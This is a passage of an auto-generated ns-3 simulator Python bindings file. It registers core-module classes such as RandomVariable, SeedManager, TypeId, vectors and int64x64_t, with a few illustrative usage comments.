[param('ns3::Ptr< ns3::MobilityModel const >', 'a'), param('ns3::Ptr< ns3::MobilityModel const >', 'b'), param('uint32_t', 'modelUid')])
return
def register_Ns3RandomVariable_methods(root_module, cls):
cls.add_output_stream_operator()
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable(ns3::RandomVariable const & o) [copy constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'o')])
## random-variable.h (module 'core'): uint32_t ns3::RandomVariable::GetInteger() const [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::RandomVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
return
def register_Ns3SeedManager_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SeedManager::SeedManager() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::SeedManager::SeedManager(ns3::SeedManager const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SeedManager const &', 'arg0')])
## random-variable.h (module 'core'): static bool ns3::SeedManager::CheckSeed(uint32_t seed) [member function]
cls.add_method('CheckSeed',
'bool',
[param('uint32_t', 'seed')],
is_static=True)
## random-variable.h (module 'core'): static uint32_t ns3::SeedManager::GetRun() [member function]
cls.add_method('GetRun',
'uint32_t',
[],
is_static=True)
## random-variable.h (module 'core'): static uint32_t ns3::SeedManager::GetSeed() [member function]
cls.add_method('GetSeed',
'uint32_t',
[],
is_static=True)
## random-variable.h (module 'core'): static void ns3::SeedManager::SetRun(uint32_t run) [member function]
cls.add_method('SetRun',
'void',
[param('uint32_t', 'run')],
is_static=True)
## random-variable.h (module 'core'): static void ns3::SeedManager::SetSeed(uint32_t seed) [member function]
cls.add_method('SetSeed',
'void',
[param('uint32_t', 'seed')],
is_static=True)
return
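# Usage sketch (illustrative, not generated): the static SeedManager methods
# registered above map directly onto class methods of ns.core.SeedManager
# (module name assumed from the standard ns-3 build):
#
#   import ns.core
#   ns.core.SeedManager.SetSeed(12345)   # global RNG seed
#   ns.core.SeedManager.SetRun(7)        # substream selection
#   assert ns.core.SeedManager.GetSeed() == 12345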
def register_Ns3SequentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(ns3::SequentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SequentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, double i=1, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('double', 'i', default_value='1'), param('uint32_t', 'c', default_value='1')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, ns3::RandomVariable const & i, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('ns3::RandomVariable const &', 'i'), param('uint32_t', 'c', default_value='1')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TriangularVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(ns3::TriangularVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TriangularVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(double s, double l, double mean) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l'), param('double', 'mean')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
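# Usage sketch (illustrative, not generated): TypeId's static lookup plus the
# introspection getters registered above allow enumerating the attribute
# system from Python (module name ns.core assumed):
#
#   import ns.core
#   tid = ns.core.TypeId.LookupByName("ns3::LogDistancePropagationLossModel")
#   for i in range(tid.GetAttributeN()):
#       print(tid.GetAttributeFullName(i))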
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UniformVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(ns3::UniformVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UniformVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(double s, double l) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l')])
## random-variable.h (module 'core'): uint32_t ns3::UniformVariable::GetInteger(uint32_t s, uint32_t l) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 's'), param('uint32_t', 'l')])
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue(double s, double l) [member function]
cls.add_method('GetValue',
'double',
[param('double', 's'), param('double', 'l')])
return
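# Usage sketch (illustrative, not generated): the overloads registered above
# give UniformVariable both a parameterless and a ranged form from Python
# (module name ns.core assumed):
#
#   import ns.core
#   u = ns.core.UniformVariable(0.0, 1.0)
#   x = u.GetValue()            # double drawn from [0, 1)
#   y = u.GetValue(5.0, 10.0)   # ranged overload
#   n = u.GetInteger(0, 10)     # uint32_t overload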
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
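# Usage sketch (illustrative, not generated): Vector3D is exposed as a plain
# value type with mutable x/y/z instance attributes; the registered
# output-stream operator backs str() (module name ns.core assumed):
#
#   import ns.core
#   p = ns.core.Vector3D(1.0, 2.0, 3.0)
#   p.z = 0.5
#   print(p)   # formatted by ns3::operator<<(std::ostream&, const Vector3D&)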
def register_Ns3WeibullVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(ns3::WeibullVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::WeibullVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
return
def register_Ns3ZetaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(ns3::ZetaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZetaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(double alpha) [constructor]
cls.add_constructor([param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3ZipfVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(ns3::ZipfVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZipfVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(long int N, double alpha) [constructor]
cls.add_constructor([param('long int', 'N'), param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
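# Usage sketch (illustrative, not generated): the arithmetic and comparison
# operators registered above make int64x64_t behave like a numeric type in
# Python (module name ns.core assumed):
#
#   import ns.core
#   q = ns.core.int64x64_t(1.5)
#   q += ns.core.int64x64_t(2, 0)   # hi/lo fixed-point constructor
#   q = q * 3                       # int operand, registered above
#   q.GetDouble()                   # back to a Python float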
def register_Ns3ConstantVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(ns3::ConstantVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(double c) [constructor]
cls.add_constructor([param('double', 'c')])
## random-variable.h (module 'core'): void ns3::ConstantVariable::SetConstant(double c) [member function]
cls.add_method('SetConstant',
'void',
[param('double', 'c')])
return
def register_Ns3DeterministicVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(ns3::DeterministicVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeterministicVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(double * d, uint32_t c) [constructor]
cls.add_constructor([param('double *', 'd'), param('uint32_t', 'c')])
return
def register_Ns3EmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable(ns3::EmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): void ns3::EmpiricalVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
return
def register_Ns3ErlangVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(ns3::ErlangVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErlangVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable() [constructor]
cls.add_constructor([])
